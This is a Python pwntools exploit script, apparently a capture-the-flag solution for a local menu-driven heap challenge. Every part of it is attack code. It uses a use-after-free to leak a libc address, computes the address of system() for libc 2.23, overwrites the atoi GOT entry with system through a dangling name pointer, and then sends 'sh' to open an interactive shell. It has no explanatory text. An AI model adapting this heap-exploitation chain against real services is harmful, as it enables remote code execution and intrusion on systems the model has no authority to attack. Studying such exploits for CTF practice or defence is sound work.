exp.py

#!/usr/bin/env python

from pwn import *

# context.log_level = 'debug'

p = remote('127.0.0.1', 10001)
# p = process('./main.elf')

def alloc(name, attack = 1, defense = 2, speed = 3, precision = 4):
    p.recvuntil('choice: ')
    p.sendline('1')
    p.recvuntil('name: ')
    p.sendline(name)
    p.recvuntil('points: ')
    p.sendline(str(attack))
    p.recvuntil('points: ')
    p.sendline(str(defense))
    p.recvuntil('speed: ')
    p.sendline(str(speed))
    p.recvuntil('precision: ')
    p.sendline(str(precision))

def free(idx):
    p.recvuntil('choice: ')
    p.sendline('2')
    p.recvuntil('index: ')
    p.sendline(str(idx))

def select(idx):
    p.recvuntil('choice: ')
    p.sendline('3')
    p.recvuntil('index: ')
    p.sendline(str(idx))

def edit(name):
    p.recvuntil('choice: ')
    p.sendline('4')
    p.recvuntil('choice: ')
    p.sendline('1')
    p.recvuntil('name: ')
    p.sendline(name)

def show():
    p.recvuntil('choice: ')
    p.sendline('5')

# gdb.attach(p, '''
# b *0x00402205
# c
# ''')

atoi_got = 0x603110

alloc('A' * 0x60)
alloc('B' * 0x80)
alloc('C' * 0x80)
select(1)

free(1)
show()
p.recvuntil('Name: ')

leak    = u64(p.recv(6).ljust(8, '\x00'))
libc    = leak - 0x3c4b78   # 0x3c4b78 = leak - libc
system  = libc + 0x045390   # $ readelf -s libc-2.23.so | grep system@

log.info("leak   => 0x%x" % leak)
log.info("libc   => 0x%x" % libc)
log.info("system => 0x%x" % system)

free(2)

alloc('D'*16 + p64(atoi_got))

# atoi@got -> system@got
edit(p64(system))

# get shell
p.recvuntil('choice: ')
p.sendline('sh')
p.interactive()